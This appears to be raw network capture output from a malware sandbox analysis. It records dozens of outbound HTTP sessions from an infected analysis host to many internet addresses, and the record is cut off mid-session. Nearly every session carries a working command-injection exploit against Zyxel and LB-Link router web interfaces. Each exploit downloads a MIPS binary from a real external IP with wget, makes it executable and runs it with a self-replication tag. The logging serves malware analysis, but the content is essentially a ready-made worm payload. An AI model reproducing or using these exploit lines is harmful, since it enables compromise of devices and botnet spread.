                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:24:32.172688961 CET427INHTTP/1.1 400 Bad Request
                                                Date: Fri, 12 Jan 2024 17:24:32 GMT
                                                Server: Apache
                                                Vary: Accept-Encoding
                                                Content-Length: 226
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3533192.168.2.135198277.201.221.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763614893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3534192.168.2.135034651.115.50.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763736963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3535192.168.2.1335974125.196.143.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763771057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3536192.168.2.1344950111.227.238.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763798952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3537192.168.2.1360070189.136.118.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763858080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3538192.168.2.1346256104.156.111.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763895988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3539192.168.2.1343614186.1.105.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763942957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3540192.168.2.133639834.201.100.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.763984919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3541192.168.2.1344638115.214.132.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764034986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3542192.168.2.1342316150.151.55.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764070034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3543192.168.2.1346372110.181.117.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764115095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3544192.168.2.1333558182.87.166.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764167070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3545192.168.2.1353550163.240.89.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764198065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3546192.168.2.1346834113.198.162.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764242887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3547192.168.2.1334472136.200.90.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764296055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3548192.168.2.1359756219.64.240.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764333963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3549192.168.2.136089265.13.58.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764377117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3550192.168.2.1340780179.138.61.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764395952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3551192.168.2.1346992221.38.121.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764446974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3552192.168.2.1348534208.65.199.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764496088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3553192.168.2.135412258.4.191.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764535904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3554192.168.2.135560020.2.53.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764578104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3555192.168.2.135379489.103.167.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764612913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3556192.168.2.1357896148.183.246.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764652967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3557192.168.2.1340938150.36.102.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764694929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3558192.168.2.1334298142.104.107.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764745951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3559192.168.2.1345462168.47.249.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764786959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3560192.168.2.134284080.47.96.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764827013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3561192.168.2.135615219.221.52.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764842033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3562192.168.2.13478322.1.126.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764906883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3563192.168.2.1358760166.53.225.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764949083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3564192.168.2.134419476.127.225.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.764976978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3565192.168.2.134251073.238.8.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765014887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3566192.168.2.133708481.188.105.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765064001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3567192.168.2.134223660.94.236.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765109062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3568192.168.2.134597060.33.229.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765146971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3569192.168.2.1356746191.246.78.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765181065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3570192.168.2.135280873.177.5.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765228033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3571192.168.2.1360918161.60.213.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765259027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3572192.168.2.135805417.57.9.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765326023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3573192.168.2.1349160213.219.113.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765360117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3574192.168.2.1358258138.142.49.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765408039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3575192.168.2.135272285.42.212.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765441895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3576192.168.2.1356470126.228.177.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765455961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3577192.168.2.134194863.211.55.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765505075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3578192.168.2.1344272151.228.162.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765551090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3579192.168.2.1350640108.232.200.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765602112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3580192.168.2.1333218119.51.25.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765638113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3581192.168.2.1334958176.93.218.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765690088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3582192.168.2.1351908130.12.251.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765729904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3583192.168.2.135961666.206.241.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765763044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3584192.168.2.1349596196.153.21.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765810966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3585192.168.2.1349414136.29.249.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765857935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3586192.168.2.134908212.165.80.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765870094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3587192.168.2.133602424.117.156.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765945911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3588192.168.2.1358204196.134.148.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765949965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3589192.168.2.1342018202.194.178.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:32.765978098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3590192.168.2.1353238168.188.246.110443
                                                TimestampBytes transferredDirectionData
